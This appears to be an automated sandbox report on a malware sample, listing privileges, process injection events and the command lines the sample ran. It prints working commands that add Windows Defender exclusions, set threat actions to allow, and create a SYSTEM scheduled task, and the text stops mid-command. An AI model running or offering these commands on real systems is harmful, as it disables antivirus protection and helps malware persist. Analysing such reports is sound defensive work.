Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3952 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe
PID 3952 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe
PID 3952 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe
PID 1648 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1648 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1648 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1632 wrote to memory of 4040 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 4040 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 4040 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4040 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4040 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4040 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3168 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3168 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3168 wrote to memory of 1892 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1648 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1648 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1648 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4644 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4644 wrote to memory of 1112 N/A C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1112 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1112 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1112 wrote to memory of 3856 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3856 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3856 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3856 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2404 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 1744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 1744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 1744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4064 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\gpupdate.exe
PID 1112 wrote to memory of 4464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\gpupdate.exe
PID 1112 wrote to memory of 4464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\gpupdate.exe
PID 1112 wrote to memory of 3632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3632 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4924 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4480 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 720 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 4396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 3184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1112 wrote to memory of 2304 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe

"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe

.\Install.exe /riRVBdidLX "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bjzvzwrptCEFdBfgJx" /SC once /ST 23:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe\" Fi /Wgsite_idydi 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe

C:\Users\Admin\AppData\Local\Temp\IzgzDpAcykvAyjOga\SsZBMntoSujlFmS\AsrnguO.exe Fi /Wgsite_idydi 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OiJitsNRDAtU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\atUnoJEcU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bHChqWbaifmeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tYlulnlhfvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hdPjkOXNzukcsjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 